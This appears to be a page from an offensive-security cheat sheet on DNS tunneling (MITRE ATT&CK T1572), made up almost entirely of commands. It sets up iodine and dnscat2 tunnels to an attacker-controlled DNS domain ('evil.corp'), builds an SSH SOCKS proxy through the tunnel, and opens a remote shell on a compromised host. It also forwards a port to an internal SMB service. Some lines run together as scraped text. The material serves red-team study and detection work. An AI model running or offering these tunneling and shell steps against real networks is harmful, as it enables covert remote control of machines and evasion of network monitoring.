DNS Tunneling
MITRE ATT&CK™ Protocol Tunneling - Technique T1572
Theory
Practice
v4resk@kali$ sudo iodined -f -c -P password 10.1.1.1/24 my.attackingDnsServer.com [email protected]$ sudo iodine -P password my.dnsServer.com veresk@kali$ ssh [email protected] -4 -D 1080 -Nfdnscat2-server evil.corp# Connect if server is an authoritative DNS server.
./dnscat evil.corp
# talk directly to the server without a domain name
./dnscat --dns server=x.x.x.x,port=53# List sessions
dnscat2> windows
# Select a session
dnscat2> window -i <SESSION_ID>
# We can:
## Get a shell from a session
command (pwnedHost) 1> shell
[Ctrl+Z]
dnscat2> window -i <SHELL_SESSION_ID>
sh (pwnedHost) 2> whoami
sh (pwnedHost) 2> user01
## Do a port forward from a session
#<DNSCAT_SRV_LOCAL_IP>:<DNSCAT_SRV_LOCAL_PORT> <REMOTE_IP>:<REMOTE_PORT>
command (pwnedHost) 1> listen 127.0.0.1:4455 10.10.12.11:445 Resources
Last updated